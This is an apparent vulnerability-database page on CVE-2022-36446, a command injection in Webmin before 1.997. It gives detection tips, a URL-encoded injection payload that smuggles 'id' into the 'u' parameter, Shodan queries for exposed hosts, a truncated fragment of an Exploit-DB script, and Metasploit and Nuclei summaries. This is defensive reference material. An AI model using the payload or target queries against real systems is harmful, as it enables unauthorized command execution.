CVE-2022-36446
published 2022-07-25CVE-2022-36446: software/apt-lib.pl in Webmin before 1.997 lacks HTML escaping for a UI command.
PriorityP279critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
96.05%
99.9th percentile
software/apt-lib.pl in Webmin before 1.997 lacks HTML escaping for a UI command.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| webmin | webmin | < 1.997 | 1.997 |
Detection & IOCsextracted from sources · hover to see the quote
commandmode=new&search=ssh&redir=&redirdesc=&u=0%3Becho+%27{{randstr}}%27%27{{randstr}}%27%3B+id%3B+echo+%27{{randstr}}%27%27{{randstr}}%27&confirm=Install%2BNow↗
- →Look for POST requests to /package-updates/update.cgi with a 'u' parameter containing shell metacharacters (e.g., semicolons, encoded as %3B) indicating command injection attempts. ↗
- →Detect authenticated sessions accessing the Software Package Updates module (data-module="package-updates") followed immediately by a POST to update.cgi — this is the exploit flow. ↗
- →The exploit requires the Referer header set to the /package-updates/update.cgi?xnavigation=1 endpoint; alert on POST requests to update.cgi with this specific Referer. ↗
- →Shodan/FOFA exposure queries for Webmin instances: search for title:"Webmin" or http.title:"webmin" to identify internet-exposed targets. ↗
- →Response body containing both a repeated random string and uid/gid/groups output confirms successful RCE via the command injection payload. ↗
- →The vulnerability is in software/apt-lib.pl; monitor for unexpected child processes spawned by the Webmin process (e.g., apt, yum) with user-controlled arguments containing shell operators. ↗
- ·Exploitation requires valid credentials AND the authenticated account must have access to the Software Package Updates module; unauthenticated exploitation is not possible. ↗
- ·The NVD CVSS score (9.8) is rated for no authentication required (PR:N), but the actual exploit is authenticated — detections should account for the authenticated exploit path rather than unauthenticated. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Webmin 1.996 - Remote Code Execution (RCE) (Authenticated)
exploitdb·2022-08-01·CVSS 9.8
CVE-2022-36446 [CRITICAL] Webmin 1.996 - Remote Code Execution (RCE) (Authenticated)
Webmin 1.996 - Remote Code Execution (RCE) (Authenticated)
---
# Exploit Title: Webmin 1.996 - Remote Code Execution (RCE) (Authenticated)
# Date: 2022-07-25
# Exploit Author: Emir Polat
# Technical analysis: https://medium.com/@emirpolat/cve-2022-36446-webmin-1-997-7a9225af3165
# Vendor Homepage: https://www.webmin.com/
# Software Link: https://www.webmin.com/download.html
# Version: sid={session.cookies['sid']}")
print(f"[+] User Found => {sysUser[0]}")
res = session.get(updateUrl)
bs = BeautifulSoup(res.text, 'html.parser')
updateAccess = [item["data-module"] for item in bs.find_all() if "data-module" in item.attrs]
if updateAccess[0] == "package-updates":
print(f"[+] User '{sysUser[0]}' has permission to access >")
print(f"[+] Exploit starting ... ")
print(f"[+] Shell will spawn t
Metasploit
Webmin Package Updates RCE
metasploit
Webmin Package Updates RCE
Webmin Package Updates RCE
This module exploits an arbitrary command injection in Webmin versions prior to 1.997. Webmin uses the OS package manager (`apt`, `yum`, etc.) to perform package updates and installation. Due to a lack of input sanitization, it is possibe to inject arbitrary command that will be concatenated to the package manager call. This exploit requires authentication and the account must have access to the Software Package Updates module.
Nuclei
Webmin <1.997 - Authenticated Remote Code Execution
nuclei·CVSS 9.8
CVE-2022-36446 [CRITICAL] Webmin <1.997 - Authenticated Remote Code Execution
Webmin <1.997 - Authenticated Remote Code Execution
Webmin before 1.997 is susceptible to authenticated remote code execution via software/apt-lib.pl, which lacks HTML escaping for a UI command. An attacker can perform command injection attacks and thereby execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
Template:
id: CVE-2022-36446
info:
name: Webmin <1.997 - Authenticated Remote Code Execution
author: gy741
severity: critical
description: |
Webmin before 1.997 is susceptible to authenticated remote code execution via software/apt-lib.pl, which lacks HTML escaping for a UI command. An attacker can perform command injection attacks and thereby execute malware, obtain sensitive informat
http://packetstormsecurity.com/files/167894/Webmin-1.996-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/168049/Webmin-Package-Updates-Command-Injection.htmlhttps://gist.github.com/emirpolatt/cf19d6c0128fa3e25ebb47e09243919bhttps://github.com/webmin/webmin/commit/13f7bf9621a82d93f1e9dbd838d1e22020221bdehttps://github.com/webmin/webmin/compare/1.996...1.997https://www.exploit-db.com/exploits/50998http://packetstormsecurity.com/files/167894/Webmin-1.996-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/168049/Webmin-Package-Updates-Command-Injection.htmlhttps://gist.github.com/emirpolatt/cf19d6c0128fa3e25ebb47e09243919bhttps://github.com/webmin/webmin/commit/13f7bf9621a82d93f1e9dbd838d1e22020221bdehttps://github.com/webmin/webmin/compare/1.996...1.997https://www.exploit-db.com/exploits/50998
2022-07-25
Published